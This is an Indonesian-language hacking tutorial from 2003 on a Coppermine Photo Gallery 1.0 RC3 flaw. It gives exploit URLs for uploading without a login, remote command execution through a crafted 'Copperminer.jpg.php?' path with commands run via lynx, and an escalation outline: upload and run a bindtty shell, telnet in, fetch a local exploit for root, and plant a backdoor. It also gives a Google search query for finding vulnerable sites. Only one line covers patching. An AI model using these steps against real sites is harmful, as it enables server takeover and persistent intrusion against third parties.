/*--------------------------------------------------------------------------------*/
 - Photo Gallery Copperminer Bug
 - Source  : http://www.securityfocus.com/archive/1/317705/2003-04-05/2003-04-11/0
 - Tanggal : 07 April 2003
 - Just for Knowledge, tidak diizinkan buat cyber crime
/*--------------------------------------------------------------------------------*/

Copperminer adalah template photo gallery yang bagus, user friendly serta memiliki
fitur fitur yang bagus. Copperminer Photo Gallery
dibuat oleh http://www.chezgreg.net/coppermine/ dan ternyata memiliki bug yang cukup 
fatal, yaitu bisa non member mengupload gambar gambar ke dalam gallery foto nya, dan 
yang lebih fatal lagi adalah bisa mendapatkan root.

Step by Step CPG
0. Target adalah Coppermine Versi 1.0 RC3

1. Upload Image untuk non member
   - url normal : http://www.domain.com/upload.php?album=
     Dengan bentuk normal seperti, non member tidak bisa melakukan upload image
   - url bug 
     Dengan menambahkan /albums/userpics/Copperminer.jpg.php? membuat situs tersebut
     terbuka untuk upload gambar tanpa harus login member.
     url lengkap : http://www.domain.com/upload.php?album=/albums/userpics/Copperminer.jpg.php?
     dan akan mengeluarkan formulir buat upload image

2. Compromise getting root
   Berdasarkan penelitian yang dilakukan oleh penulis bhw bug ini hanya berlaku file 
   Copperminer.jpg. Selain dari image ini bug nya tidak berlaku, dan penulis sudah mencoba
   mengeksekusi selain itu, namun hasilnya gagal
   Exploitasi CPG.
   - http://www.domain.com/albums/userpics/Copperminer.jpg di browser anda, dan akan menampilkan
     logo dari CPG
   - Menambahkan .php di ujung url tersebut. Menjadi
     http://www.domain.com/albums/userpics/Copperminer.jpg.php?
   - Url tersebut ternyata tidak merubah tampilan, dan anehnya dengan penambahan ekstensi .php
     image sama sekali tidak berubah.
   - penambahan command command linux di ujung seperti id ; uname -a ; ls -al
     Saat itu diberikan dengan url lengkap seperti
     http://www.domain.com/albums/userpics/Copperminer.jpg.php?id ; uname -a ; ls -al
     Tetap tidak mengubah tampilan.
   - Pindah ke shell. Eksekusi tampilan tersebut dengan menggunakan command lynx
     lynx http://www.domain.com/albums/userpics/Copperminer.jpg.php?id ; uname -a ; ls -al
     bravo... you got something different...
   - Eksekusi selanjutnya di dalam shell tinggal mengganti command command linux di belakang
     Copperminer.jpg.php? sehingga bisa di exploitasi lebih lanjut

3. Buat dapatin root
   1. Upload ke dalam file bindtty
   2. Eksekusi file bindtty
   3. Login lewat telnet (sesuaikan dengan bindtty anda)
   4. Download local exploit
   5. Dapat root
      Pasang backdoor

4. Cara mencari target Copperminer adalah dengan memanfaatkan google.com dan memberikan
   keyword : allinurl:/upload.php?album=
   Dan google akan memberikan hampir 90% template dari Copperminer

5. Patching. Jika anda pemilik situs ini, anda boleh download patch nya di situs
   http://www.chezgreg.net/coppermine/ atau lakukan upgrade ke versi yang lebih tinggi

Thank To :
a. Mas wachers dan Renjana Crew
b. level9-team, salatigahackerlink